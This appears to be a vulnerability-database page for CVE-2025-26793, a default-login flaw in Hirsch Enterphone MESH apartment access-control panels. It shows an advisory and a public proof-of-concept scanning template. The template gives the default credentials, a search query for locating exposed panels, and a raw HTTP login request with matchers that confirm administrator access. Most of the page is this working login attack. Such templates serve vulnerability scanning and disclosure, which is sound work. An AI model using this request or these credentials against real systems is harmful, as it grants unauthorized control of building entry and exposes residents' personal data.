CVE-2025-26793: FREEDOM Administration - Default Login

2025-08-01 FREEDOM Administration PoC Public

Description

The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the "vulnerable systems are not following manufacturers' recommendations to change the default password."

PoC

id: CVE-2025-26793

info:
  name: FREEDOM Administration - Default Login
  author: Eric Daigle,DhiyaneshDK
  severity: critical
  description: |
    The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the "vulnerable systems are not following manufacturers' recommendations to change the default password."
  impact: |
    Attackers can gain unauthorized access to building management systems using default credentials, potentially exposing residents' personally identifiable information and controlling access to apartment buildings.
  remediation: |
    Change default credentials immediately to strong, unique passwords as recommended in the manufacturer's security guidelines.
  reference:
    - https://www.ericdaigle.ca/posts/breaking-into-dozens-of-apartments-in-five-minutes/
    - https://news.ycombinator.com/item?id=43160884
    - https://support.identiv.com/products/physical-access/hirsch/
  classification:
    epss-score: 0.02416
    epss-percentile: 0.83311
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="FREEDOM Administration"
  tags: cve,cve2025,freedom,admin,mesh,vkev,vuln

variables:
  username: "freedom"
  password: "viscount"

http:
  - raw:
      - |
        POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        formLoginName={{username}}&formLoginPassword={{password}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Administration: Controlled Areas"
          - "Log Out"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200d3d14eb3c9b2c11e6ce370a9277b2acac88d2e58e06c0da66cf554e85f5de7a02202c098eea869689138dc1c7629a5c801dc1a08edd3547487d5a2aecdc8a5fe550:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities